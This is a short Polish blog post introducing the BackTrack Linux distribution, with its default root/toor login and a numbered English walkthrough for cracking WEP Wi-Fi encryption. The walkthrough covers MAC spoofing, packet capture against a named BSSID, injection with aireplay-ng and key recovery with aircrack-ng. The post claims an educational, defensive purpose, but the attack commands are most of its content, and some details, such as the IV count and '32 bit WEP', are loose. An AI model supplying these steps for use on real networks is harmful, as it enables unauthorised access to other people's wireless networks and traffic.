BackTrack

image

powstał po to żeby uświadomić ludziom  istnienie narzędzi , programów używanych przez hakerów i poprzez świadomość tych programów uczyć ludzi jak zabezpieczać własne sieci ,np. jak złamać nieskuteczne zabezpieczenie WEP.

http://www.backtrack-linux.org/downloads/

Login: root
Haslo: toor

Backtrack opart jest na Debianie (tak samo jak Ubuntu i Mint) tak że te same programy można używać na tych dystrybucjach.
http://hack.pl/forum/linux/7462-aircrack-ng-jak-atakowac-krok-po-kroku-wep.html

http://zedomax.com/blog/2010/04/18/wep-hack-how-to-crack-wep/

instrukcja

1,2Next type “ifconfig” and/or “iwconfig” to find out your WiFi card’s linux handle such as eth0, wlan0, or ath0.

3. Now type airmon-ng stop wlan0
4.Now type ifconfig wlan0 down
5.Now type macchanger –mac 00:11:22:33:44:55 wlan0 (przy mac są 2 kreski )
6.Now type airmon-ng start wlan0
7.Now type airodump-ng wlan0
*You need to note the Channel, The BSSID, and the ESSID to crack.*
8.Now type airodump-ng -c “whatever channel” -w “whateverfilenameuwant” –BSSID “whateverbssid” “eth1″
*Make sure that you leave this window open so run a new Terminal.*
airodump-ng -c 5 -w pikus -b 00:25:86:B8:27:68 wlan0
9.aireplay-ng -1 0 -a “bssid” -h 00:11:22:33:44:55 “eth1″
aireplay-ng -1 0 -a 00:25:86:B8:27:68 -h 00:11:22:33:44:55 wlan0
*Leave this windows open.*
10.aireplay-ng -3 -b “bssid -h 00:11:22:33:44:55 “eth1″
*Leave this window open.*

aireplay-ng -3 -b 00:25:86:B8:27:68 -h 00:11:22:33:44:55 wlan0
11. Now go back and wait for the Data to hit 1000 IVS than run the next command.
*This is for a 32 bit WEP.*
11.aircrack-ng -b “bssid” “whateverfilename”.

WEP

Dodaj komentarz

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Zmień )

Twitter picture

You are commenting using your Twitter account. Log Out / Zmień )

Facebook photo

You are commenting using your Facebook account. Log Out / Zmień )

Connecting to %s